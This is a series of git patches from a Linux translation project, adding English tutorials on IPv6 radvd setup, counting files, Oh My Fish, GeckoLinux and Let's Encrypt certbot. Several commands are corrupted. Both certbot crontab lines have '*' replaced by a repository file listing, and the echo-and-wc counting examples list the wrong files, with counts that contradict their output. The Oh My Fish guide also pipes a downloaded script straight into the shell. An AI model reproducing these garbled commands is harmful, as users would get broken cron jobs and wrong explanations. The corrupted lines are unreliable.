+It's a little confusing with all the start and not started messages, but radvd is not running, which you can verify with good old `ps|grep radvd`. So we need to create `/etc/radvd.conf`. Copy this example, replacing the network interface name on the first line with your interface name:
+```
+interface ens7 {
+ AdvSendAdvert on;
+ MinRtrAdvInterval 3;
+ MaxRtrAdvInterval 10;
+ prefix fd7d:844d:3e17:f3ae::/64
+ {
+ AdvOnLink on;
+ AdvAutonomous on;
+ };
+
+};
+
+```
+
+The prefix defines your network address, which is the first 64 bits of the address. The first two characters must be `fd`, then you define the remainder of the prefix, and leave the last 64 bits empty as radvd will assign the last 64 bits. The next 16 bits after the prefix define the subnet, and the remaining bits define the host address. Your subnet size must always be /64. RFC 4193 requires that addresses be randomly generated; see [Testing IPv6 Networking in KVM: Part 1][1] for more information on creating and managing ULAs.
+
+### IPv6 Forwarding
+
+IPv6 forwarding must be enabled. This command enables it until restart:
+```
+$ sudo sysctl -w net.ipv6.conf.all.forwarding=1
+
+```
+
+Uncomment or add this line to `/etc/sysctl.conf` to make it permanent:
+```
+net.ipv6.conf.all.forwarding = 1
+```
+
+Start the radvd daemon:
+```
+$ sudo systemctl stop radvd
+$ sudo systemctl start radvd
+
+```
+
+This example reflects a quirk I ran into on my Ubuntu test system; I always have to stop radvd, no matter what state it is in, and then start it to apply any changes.
+
+You won't see any output on a successful start, and often not on a failure either, so run `sudo systemctl radvd status`. If there are errors, systemctl will tell you. The most common errors are syntax errors in `/etc/radvd.conf`.
+
+A cool thing I learned after complaining on Twitter: when you run ` journalctl -xe --no-pager` to debug systemctl errors, your output lines will wrap, and then you can actually read your error messages.
+
+Now check your hosts to see their new auto-assigned addresses:
+```
+$ ifconfig
+ens7 Link encap:Ethernet HWaddr 52:54:00:57:71:50
+ [...]
+ inet6 addr: fd7d:844d:3e17:f3ae:9808:98d5:bea9:14d9/64 Scope:Global
+ [...]
+
+```
+
+And there it is! Come back next week to learn how to manage DNS for ULAs, so you can use proper hostnames instead of those giant IPv6 addresses.
+
+Learn more about Linux through the free ["Introduction to Linux" ][2]course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2017/12/ipv6-auto-configuration-linux
+
+作者:[Carla Schroder][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/cschroder
+[1]:https://www.linux.com/learn/intro-to-linux/2017/11/testing-ipv6-networking-kvm-part-1
+[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 3521f0c6518ba7b5fda217da4425c9cc15b4a2b0 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:50:28 +0800
Subject: [PATCH 100/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Count?=
=?UTF-8?q?=20The=20Number=20Of=20Files=20And=20Folders/Directories=20In?=
=?UTF-8?q?=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Files And Folders-Directories In Linux.md | 179 ++++++++++++++++++
1 file changed, 179 insertions(+)
create mode 100644 sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
diff --git a/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
new file mode 100644
index 0000000000..b3cc45af13
--- /dev/null
+++ b/sources/tech/20171212 How To Count The Number Of Files And Folders-Directories In Linux.md
@@ -0,0 +1,179 @@
+How To Count The Number Of Files And Folders/Directories In Linux
+======
+Hi folks, today again we came with set of tricky commands that help you in many ways. It's kind of manipulation commands which help you to count files and directories in the current directory, recursive count, list of files created by particular user, etc,.
+
+In this tutorial, we are going to show you, how to use more than one command like, all together to perform some advanced actions using ls, egrep, wc and find command. The below set of commands which helps you in many ways.
+
+To experiment this, i'm going to create totally 7 files and 2 folders (5 regular files & 2 hidden files). See the below tree command output which clearly shows the files and folder lists.
+
+**Suggested Read :** [File Manipulation Commands][1]
+```
+# tree -a /opt
+/opt
+├── magi
+│ └── 2g
+│ ├── test5.txt
+│ └── .test6.txt
+├── test1.txt
+├── test2.txt
+├── test3.txt
+├── .test4.txt
+└── test.txt
+
+2 directories, 7 files
+
+```
+
+**Example-1 :** To count current directory files (excluded hidden files). Run the following command to determine how many files there are in the current directory and it doesn't count dotfiles.
+```
+# ls -l . | egrep -c '^-'
+4
+
+```
+
+**Details :**
+
+ * `ls` : list directory contents
+ * `-l` : Use a long listing format
+ * `.` : List information about the FILEs (the current directory by default).
+ * `|` : control operator that send the output of one program to another program for further processing.
+ * `egrep` : print lines matching a pattern
+ * `-c` : General Output Control
+ * `'^-'` : This respectively match the empty string at the beginning and end of a line.
+
+
+
+**Example-2 :** To count current directory files which includes hidden files. This will include dotfiles as well in the current directory.
+```
+# ls -la . | egrep -c '^-'
+5
+
+```
+
+**Example-3 :** Run the following command to count current directory files & folders. It will count all together at once.
+```
+# ls -1 | wc -l
+5
+
+```
+
+**Details :**
+
+ * `ls` : list directory contents
+ * `-l` : Use a long listing format
+ * `|` : control operator that send the output of one program to another program for further processing.
+ * `wc` : It's a command to print newline, word, and byte counts for each file
+ * `-l` : print the newline counts
+
+
+
+**Example-4 :** To count current directory files & folders which includes hidden files & directory.
+```
+# ls -1a | wc -l
+8
+
+```
+
+**Example-5 :** To count current directory files recursively which includes hidden files.
+```
+# find . -type f | wc -l
+7
+
+```
+
+**Details :**
+
+ * `find` : search for files in a directory hierarchy
+ * `-type` : File is of type
+ * `f` : regular file
+ * `wc` : It's a command to print newline, word, and byte counts for each file
+ * `-l` : print the newline counts
+
+
+
+**Example-6 :** To print directories & files count using tree command (excluded hidden files).
+```
+# tree | tail -1
+2 directories, 5 files
+
+```
+
+**Example-7 :** To print directories & files count using tree command which includes hidden files.
+```
+# tree -a | tail -1
+2 directories, 7 files
+
+```
+
+**Example-8 :** Run the below command to count directory recursively which includes hidden directory.
+```
+# find . -type d | wc -l
+3
+
+```
+
+**Example-9 :** To count the number of files based on file extension. Here we are going to count `.txt` files.
+```
+# find . -name "*.txt" | wc -l
+7
+
+```
+
+**Example-10 :** Count all files in the current directory by using the echo command in combination with the wc command. `4` indicates the amount of files in the current directory.
+```
+# echo core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md README.md sign.md 选题模板.txt 中文排版指北.md | wc
+1 4 39
+
+```
+
+**Example-11 :** Count all directories in the current directory by using the echo command in combination with the wc command. `1` indicates the amount of directories in the current directory.
+```
+# echo comic/ published/ sources/ translated/ | wc
+1 1 6
+
+```
+
+**Example-12 :** Count all files and directories in the current directory by using the echo command in combination with the wc command. `5` indicates the amount of directories and files in the current directory.
+```
+# echo * | wc
+1 5 44
+
+```
+
+**Example-13 :** To count number of files in the system (Entire system)
+```
+# find / -type f | wc -l
+69769
+
+```
+
+**Example-14 :** To count number of folders in the system (Entire system)
+```
+# find / -type d | wc -l
+8819
+
+```
+
+**Example-15 :** Run the following command to count number of files, folders, hardlinks, and symlinks in the system (Entire system)
+```
+# find / -type d -exec echo dirs \; -o -type l -exec echo symlinks \; -o -type f -links +1 -exec echo hardlinks \; -o -type f -exec echo files \; | sort | uniq -c
+ 8779 dirs
+ 69343 files
+ 20 hardlinks
+ 11646 symlinks
+
+```
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/how-to-count-the-number-of-files-and-folders-directories-in-linux/
+
+作者:[Magesh Maruthamuthu][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/magesh/
+[1]:https://www.2daygeek.com/empty-a-file-delete-contents-lines-from-a-file-remove-matching-string-from-a-file-remove-empty-blank-lines-from-a-file/
From 32e468360294581e5a42ec5eacd8105970011887 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:52:52 +0800
Subject: [PATCH 101/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Oh=20My=20Fish!?=
=?UTF-8?q?=20Make=20Your=20Shell=20Beautiful?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...2 Oh My Fish- Make Your Shell Beautiful.md | 253 ++++++++++++++++++
1 file changed, 253 insertions(+)
create mode 100644 sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
diff --git a/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
new file mode 100644
index 0000000000..a085692994
--- /dev/null
+++ b/sources/tech/20171212 Oh My Fish- Make Your Shell Beautiful.md
@@ -0,0 +1,253 @@
+Oh My Fish! Make Your Shell Beautiful
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/12/oh-my-fish-720x340.jpg)
+
+A few days ago, we discussed how to [**install** **Fish shell**][1], a robust, fully-usable shell that ships with many cool features out of the box such as autosuggestions, built-in search functionality, syntax highlighting, web based configuration and a lot more. Today, we are going to discuss how to make our Fish shell beautiful and elegant using **Oh My Fish** (shortly **omf** ). It is a Fishshell framework that allows you to install packages which extend or modify the look and feel of your shell. It is easy to use, fast and extensible. Using omf, you can easily install themes that enriches the look of your shell and install plugins to tweak your fish shell as per your wish.
+
+#### Install Oh My Fish
+
+Installing omf is not a big deal. All you have to do is just run the following command in your fish shell.
+```
+curl -L https://get.oh-my.fish | fish
+```
+
+[![][2]][3]
+
+Once the installation has completed, you will see the the prompt has automatically changed as shown in the above picture. Also, you will notice that the current time on the right of the shell window.
+
+That's it. Let us go ahead and tweak our fish shell.
+
+#### Now, Let Us Make Our Fish Shell Beautiful
+
+To list all installed packages, run:
+```
+omf list
+```
+
+This command will display both the installed themes and plugins. Please note that a package can be either a theme or plugin. Installing packages means installing themes or plugins.
+
+All official and community supported packages (both plugins and themes) are hosted in the [**main Omf repository**][4]. In this repository, you can see a whole bunch of repositories that contains a lot of plugins and themes.
+
+Now let us see the list of available and installed themes. To do so, run:
+```
+omf theme
+```
+
+[![][2]][5]
+
+As you can see, we have only one installed theme, which is default, and a whole bunch of available themes. You can preview all available themes [**here**][6] before installing it. This page contains all theme details, features, a sample screenshot of each theme and which theme is suitable for whom.
+
+**Installing a new theme**
+
+Allow me to install a theme, for example **clearance theme - **a minimalist fish shell theme for people who use git a lot. To do so, run:
+```
+omf install clearance
+```
+
+[![][2]][7]
+
+As you see in the above picture, the look of fish prompt has changed immediately after installing the new theme.
+
+Let me browse through the file system and see how it looks like.
+
+[![][2]][8]
+
+Not bad! It is really simple theme. It distinguishes the current working directory, folders and files with different color. As you may notice, it also displays the current working directory on top of the prompt. Currently, **clearance** is my default theme.
+
+**Changing theme**
+
+Like I already said, the theme will be applied immediately after installing it. If you have more than one themes, you can switch to a different theme using the following command:
+```
+omf theme
+```
+
+Example:
+```
+omf theme agnoster
+```
+
+Now I am using "agnoster" theme. Here is how agnoster theme changed the look of my shell.
+
+[![][2]][9]
+
+**Installing Plugins**
+
+For instance, I am going to install weather plugin. To do so, just run:
+```
+omf install weather
+```
+
+The weather plugin depends on [jq][10]. So, you might need to install jq as well. It is mostly available in the default repositories of any Linux distro. So, you can install it using the default package manager. For example, the following command will install jq in Arch Linux and its variants.
+```
+sudo pacman -S jq
+```
+
+Now, check your weather from your fish shell using command:
+```
+weather
+```
+
+[![][2]][11]
+
+**Searching packages**
+
+To search for a theme or plugin, do:
+```
+omf search
+```
+
+Example:
+```
+omf search nvm
+```
+
+To limit the search to themes, use **-t** flag.
+```
+ omf search -t chain
+```
+
+This command will only search for themes that contains the string "chain".
+
+To limit the search to plugins, use **-p** flag.
+```
+ omf search -p emacs
+```
+
+**Updating packages**
+
+To update only the core (omf itself), run:
+```
+omf update omf
+```
+
+If it is up-to-date, you would see the following output:
+```
+Oh My Fish is up to date.
+You are now using Oh My Fish version 6.
+Updating https://github.com/oh-my-fish/packages-main master... Done!
+```
+
+To update all packages:
+```
+omf update
+```
+
+To selectively update packages, just include the packages names as shown below.
+```
+omf update clearance agnoster
+```
+
+**Displaying information about a package**
+
+When you want to know the information about a theme or plugin, use this command:
+```
+omf describe clearance
+```
+
+This command will show the information about a package.
+```
+Package: clearance
+Description: A minimalist fish shell theme for people who use git
+Repository: https://github.com/oh-my-fish/theme-clearance
+Maintainer:
+```
+
+**Removing packages**
+
+To remove a package, for example emacs, run:
+```
+omf remove emacs
+```
+
+**Managing Repositories**
+
+By default, the official repository is added automatically when you install Oh My Fish. This repository contains all packages built by the developers. To manage user-installed package repositories, use this command:
+```
+omf repositories [list|add|remove]
+```
+
+To list installed repositories, run:
+```
+omf repositories list
+```
+
+To add a repository:
+```
+omf repositories add
+```
+
+Example:
+```
+omf repositories add https://github.com/ostechnix/theme-sk
+```
+
+To remove a repository:
+```
+omf repositories remove
+```
+
+**Troubleshooting Oh My Fish**
+
+Omf is smart enough to help you if things went wrong. It will list what to do to fix an issue. For example, I removed and installed clearance package and got file conflicting error. Luckily, Oh My Fish instructed me what to do before continuing. So, I simply ran the following to know how to fix the error:
+```
+omf doctor
+```
+
+And fixed the issued the error by running the following command:
+```
+rm ~/.config/fish/functions/fish_prompt.fish
+```
+
+[![][2]][12]
+
+Whenever you ran into a problem, just run 'omf doctor' command and try all suggested workarounds.
+
+**Getting help**
+
+To display help section, run:
+```
+omf -h
+```
+
+Or,
+```
+omf --help
+```
+
+**Uninstalling Oh My Fish**
+
+To uninstall Oh My Fish, run this command:
+```
+omf destroy
+```
+
+Go ahead and start customizing your fish shell. For more details, refer the project's GitHub page.
+
+That's all for now folks. I will be soon here with another interesting guide. Until then, stay tuned with OSTechNix!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+via: https://www.ostechnix.com/oh-fish-make-shell-beautiful/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-1-1.png ()
+[4]:https://github.com/oh-my-fish
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-5.png ()
+[6]:https://github.com/oh-my-fish/oh-my-fish/blob/master/docs/Themes.md
+[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-3.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-4.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-6.png ()
+[10]:https://stedolan.github.io/jq/
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-7.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/12/Oh-My-Fish-8.png ()
From 6d4ca8abc6e1301850a4a1ff2c461d12d2569980 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:55:13 +0800
Subject: [PATCH 102/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20GeckoLinux=20Brin?=
=?UTF-8?q?gs=20Flexibility=20and=20Choice=20to=20openSUSE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ings Flexibility and Choice to openSUSE.md | 109 ++++++++++++++++++
1 file changed, 109 insertions(+)
create mode 100644 sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
diff --git a/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
new file mode 100644
index 0000000000..a4e8d9657e
--- /dev/null
+++ b/sources/tech/20171208 GeckoLinux Brings Flexibility and Choice to openSUSE.md
@@ -0,0 +1,109 @@
+GeckoLinux Brings Flexibility and Choice to openSUSE
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko-linux.jpg?itok=bjKVnW1q)
+I've been a fan of SUSE and openSUSE for a long time. I've always wanted to call myself an openSUSE user, but things seemed to get in the way--mostly [Elementary OS][1]. But every time an openSUSE spin is released, I take notice. Most recently, I was made aware of [GeckoLinux][2]--a unique take (offering both Static and Rolling releases) that offers a few options that openSUSE does not. Consider this list of features:
+
+ * Live DVD / USB image
+
+ * Editions for the following desktops: Cinnamon, XFCE, GNOME, Plasma, Mate, Budgie, LXQt, Barebones
+
+ * Plenty of pre-installed open source desktop programs and proprietary media codecs
+
+ * Beautiful font rendering configured out of the box
+
+ * Advanced Power Management ([TLP][3]) pre-installed
+
+ * Large amount of software available in the preconfigured repositories (preferring packages from the Packman repo--when available)
+
+ * Based on openSUSE (with no repackaging or modification of packages)
+
+ * Desktop programs can be uninstalled, along with all of their dependencies (whereas openSUSE's patterns often cause uninstalled packages to be re-installed automatically)
+
+ * Does not force the installation of additional recommended packages, after initial installation (whereas openSUSE pre-installs patterns that automatically installs recommended package dependencies the first time the package manager is used)
+
+
+
+
+The choice of desktops alone makes for an intriguing proposition. Keeping a cleaner, lighter system is also something that would appeal to many users--especially in light of laptops running smaller, more efficient solid state drives.
+
+Let's dig into GeckoLinux and see if it might be your next Linux distribution.
+
+### Installation
+
+I don't want to say too much about the installation--as installing Linux has become such a no-brainer these days. I will say that GeckoLinux has streamlined the process to an impressive level. The installation of GeckoLinux took about three minutes total (granted I am running it as a virtual machine on a beast of a host--so resources were not an issue). The difference between installing GeckoLinux and openSUSE Tumbleweed was significant. Whereas GeckoLinux installed in single digits, openSUSE took more 10 minutes to install. Relatively speaking, that's still not long. But we're picking at nits here, so that amount of time should be noted.
+
+The only hiccup to the installation was the live distro asking for a password for the live user. The live username is linux and the password is, as you probably already guessed, linux. That same password is also the same used for admin tasks (such as running the installer).
+
+You will also note, there are two icons on the desktop--one to install the OS and another to install language packs. Run the OS installer. Once the installation is complete--and you've booted into your desktop--you can then run the Language installer (if you need the Language packs--Figure 1).
+
+
+![GeckoLinux ][5]
+
+Figure 1: Clearly, I chose the GNOME desktop for testing purposes.
+
+[Used with permission][6]
+
+After the Language installer finished, you can then remove the installer icon from the desktop by right-clicking it and selecting Move to Trash.
+
+### Those fonts
+
+The developer claims beautiful font rendering out of the box. In fact, the developer makes this very statement:
+
+GeckoLinux comes preconfigured with what many would consider to be good font rendering, whereas many users find openSUSE's default font configuration to be less than desirable.
+
+Take a glance at Figure 2. Here you see a side by side comparison of openSUSE (on the left) and GeckLinux (on the right). The difference is very subtle, but GeckoLinux does, in fact, best openSUSE out of the box. It's cleaner and easier to read. The developer claims are dead on. Although openSUSE does a very good job of rendering fonts out of the box, GeckoLinux improves on that enough to make a difference. In fact, I'd say it's some of the cleanest (out of the box) looking fonts I've seen on a Linux distribution.
+
+
+![openSUSE][8]
+
+Figure 2: openSUSE on the left, GeckoLinux on the right.
+
+[Used with permission][6]
+
+I've worked with distributions that don't render fonts well. After hours of writing, those fonts tend to put a strain on my eyes. For anyone that spends a good amount of time staring at words, well-rendered fonts can make the difference between having eye strain or not. The openSUSE font rendering is just slightly blurrier than that of GeckoLinux. That matters.
+
+### Installed applications
+
+GeckoLinux does exactly what it claims--installs just what you need. After a complete installation (no post-install upgrading), GeckoLinux comes in at 1.5GB installed. On the other hand, openSUSE's post-install footprint is 4.3GB. In defense of openSUSE, it does install things like GNOME Games, Evolution, GIMP, and more--so much of that space is taken up with added software and dependencies. But if you're looking for a lighter weight take on openSUSE, GeckoLinux is your OS.
+
+GeckoLinux does come pre-installed with a couple of nice additions--namely the [Clementine][9] Audio player (a favorite of mine), [Thunderbird][10] (instead of Evolution), PulseAudio Volume Control (a must for audio power users), Qt Configuration, GParted, [Pidgen][11], and [VLC][12].
+
+If you're a developer, you won't find much in the way of development tools on GeckoLinux. But that's no different than openSUSE (even the make command is missing on both). Naturally, all the developer tools you need (to work on Linux) are available to install (either from the command line or from with YaST2).
+
+### Performance
+
+Between openSUSE and GeckoLinux, there is very little noticeable difference in performance. Opening Firefox on both resulted in maybe a second or two variation (in favor of GeckoLinux). It should be noted, however, that the installed Firefox on both was quite out of date (52 on GeckoLinux and 53 on openSUSE). Even after a full upgrade on both platforms, Firefox was still listed at release 52 on GeckoLinux, whereas openSUSE did pick up Firefox 57. After downloading the [Firefox Quantum][13] package on GeckoLinux, the application opened immediately--completely blowing away both out of the box experiences on openSUSE and GeckLinux. So the first thing you will want to do is get Firefox upgraded to 57.
+
+If you're hoping for a significant performance increase over openSUSE, look elsewhere. If you're accustomed to the performance of openSUSE (it not being the sprightliest of platforms), you'll feel right at home with GeckoLinux.
+
+### The conclusion
+
+If you're looking for an excuse to venture back into the realm of openSUSE, GeckoLinux might be a good reason. It's slightly better looking, lighter weight, and with similar performance. It's not perfect and, chances are, it won't steal you away from your distribution of choice, but GeckoLinux is a solid entry in the realm of Linux desktops.
+
+Learn more about Linux through the free ["Introduction to Linux" ][14]course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2017/12/geckolinux-brings-flexibility-and-choice-opensuse
+
+作者:[Jack Wallen][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/jlwallen
+[1]:https://elementary.io/
+[2]:https://geckolinux.github.io/
+[3]:https://github.com/linrunner/TLP
+[4]:/files/images/gecko1jpg
+[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko_1.jpg?itok=qTvEsSQ1 (GeckoLinux)
+[6]:/licenses/category/used-permission
+[7]:/files/images/gecko2jpg
+[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/gecko_2.jpg?itok=AKv0x7_J (openSUSE)
+[9]:https://www.clementine-player.org/
+[10]:https://www.mozilla.org/en-US/thunderbird/
+[11]:https://www.pidgin.im/
+[12]:https://www.videolan.org/vlc/index.html
+[13]:https://www.mozilla.org/en-US/firefox/
+[14]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From af3f6b23922f2e41eab1a94818009ccf372ecaef Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 17:59:19 +0800
Subject: [PATCH 103/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Create=20a=20free?=
=?UTF-8?q?=20Apache=20SSL=20certificate=20with=20Let=E2=80=99s=20Encrypt?=
=?UTF-8?q?=20on=20CentOS=20&=20RHEL?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ate with Let-s Encrypt on CentOS - RHEL.md | 114 ++++++++++++++++++
1 file changed, 114 insertions(+)
create mode 100644 sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
diff --git a/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
new file mode 100644
index 0000000000..d6a173336c
--- /dev/null
+++ b/sources/tech/20171212 Create a free Apache SSL certificate with Let-s Encrypt on CentOS - RHEL.md
@@ -0,0 +1,114 @@
+Create a free Apache SSL certificate with Let’s Encrypt on CentOS & RHEL
+======
+Let's Encrypt is a free, automated & open certificate authority that is supported by ISRG, Internet Security Research Group. Let's encrypt provides X.509 certificates for TLS (Transport Layer Security) encryption via automated process which includes creation, validation, signing, installation, and renewal of certificates for secure websites.
+
+In this tutorial, we are going to discuss how to create an apache SSL certificate with Let's Encrypt certificate on Centos/RHEL 6 & 7\. To automate the Let's encrypt process, we will use Let's encrypt recommended ACME client i.e. CERTBOT, there are other ACME Clients as well but we will be using Certbot only.
+
+Certbot can automate certificate issuance and installation with no downtime, it automatically enables HTTPS on your website. It also has expert modes for people who don't want auto-configuration. It's easy to use, works on many operating systems, and has great documentation.
+
+ **(Recommended Read:[Complete guide for Apache TOMCAT installation on Linux][1])**
+
+Let's start with Pre-requisites for creating an Apache SSL certificate with Let's Encrypt on CentOS, RHEL 6 &7…..
+
+
+## Pre-requisites
+
+ **1-** Obviously we will need Apache server to installed on our machine. We can install it with the following command,
+
+ **# yum install httpd**
+
+For detailed Apache installation procedure, refer to our article[ **Step by Step guide to configure APACHE server.**][2]
+
+ **2-** Mod_ssl should also be installed on the systems. Install it using the following command,
+
+ **# yum install mod_ssl**
+
+ **3-** Epel Repositories should be installed & enables. EPEL repositories are required as not all the dependencies can be resolved with default repos, hence EPEL repos are also required. Install them using the following command,
+
+ **RHEL/CentOS 7**
+
+ **# rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/packages/e/epel-release-7-11.noarch.rpm**
+
+ **RHEL/CentOS 6 (64 Bit)**
+
+ **# rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm**
+
+ **RHEL/CentOS 6 (32 Bit)**
+
+ **# rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm**
+
+Now let's start with procedure to install Let's Encrypt on CentOS /RHEL 7.
+
+## Let's encrypt on CentOS RHEL 7
+
+Installation on CentOS 7 can easily performed with yum, with the following command,
+
+ **$ yum install certbot-apache**
+
+Once installed, we can now create the SSL certificate with following command,
+
+ **$ certbot -apache**
+
+Now just follow the on screen instructions to generate the certificate. During the setup, you will also be asked to enforce the HTTPS or to use HTTP , select either of the one you like. But if you enforce HTTPS, than all the changes required to use HTTPS will made by certbot setup otherwise we will have to make changes on our own.
+
+We can also generate certificate for multiple websites with single command,
+
+ **$ certbot -apache -d example.com -d test.com**
+
+We can also opt to create certificate only, without automatically making any changes to any configuration files, with the following command,
+
+ **$ certbot -apache certonly**
+
+Certbot issues SSL certificates hae 90 days validity, so we need to renew the certificates before that period is over. Ideal time to renew the certificate would be around 60 days. Run the following command, to renew the certifcate,
+
+ **$ certbot renew**
+
+We can also automate the renewal process with a crontab job. Open the crontab & create a job,
+
+ **$ crontab -e**
+
+ **0 0 1 * comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md /usr/bin/certbot renew >> /var/log/letsencrypt.log**
+
+This job will renew you certificate 1st of every month at 12 AM.
+
+## Let's Encrypt on CentOS 6
+
+For using Let's encrypt on Centos 6, there are no cerbot packages for CentOS 6 but that does not mean we can't make use of let's encrypt on CentOS/RHEL 6, instead we can use the certbot script for creating/renewing the certificates. Install the script with the following command,
+
+ **# wget https://dl.eff.org/certbot-auto**
+
+ **# chmod a+x certbot-auto**
+
+Now we can use it similarly as we used commands for CentOS 7 but instead of certbot, we will use script. To create new certificate,
+
+ **# sh path/certbot-auto -apache -d example.com**
+
+To create only cert, use
+
+ **# sh path/certbot-auto -apache certonly**
+
+To renew cert, use
+
+ **# sh path/certbot-auto renew**
+
+For creating a cron job, use
+
+ **# crontab -e**
+
+ **0 0 1 * comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md sh path/certbot-auto renew >> /var/log/letsencrypt.log**
+
+This was our tutorial on how to install and use let's encrypt on CentOS , RHEL 6 & 7 for creating a free SSL certificate for Apache servers. Please do leave your questions or queries down below.
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/create-free-apache-ssl-certificate-lets-encrypt-on-centos-rhel/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/complete-guide-apache-tomcat-installation-linux/
+[2]:http://linuxtechlab.com/beginner-guide-configure-apache/
From f87745aa289ac5fcd4a2d7c5615d40408934b467 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 18:01:14 +0800
Subject: [PATCH 104/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=203=20Essential=20Q?=
=?UTF-8?q?uestions=20to=20Ask=20at=20Your=20Next=20Tech=20Interview?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ions to Ask at Your Next Tech Interview.md | 43 +++++++++++++++++++
1 file changed, 43 insertions(+)
create mode 100644 sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
diff --git a/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
new file mode 100644
index 0000000000..7f90ef282d
--- /dev/null
+++ b/sources/tech/20171203 3 Essential Questions to Ask at Your Next Tech Interview.md
@@ -0,0 +1,43 @@
+3 Essential Questions to Ask at Your Next Tech Interview
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/os-jobs_0.jpg?itok=nDf5j7xC)
+
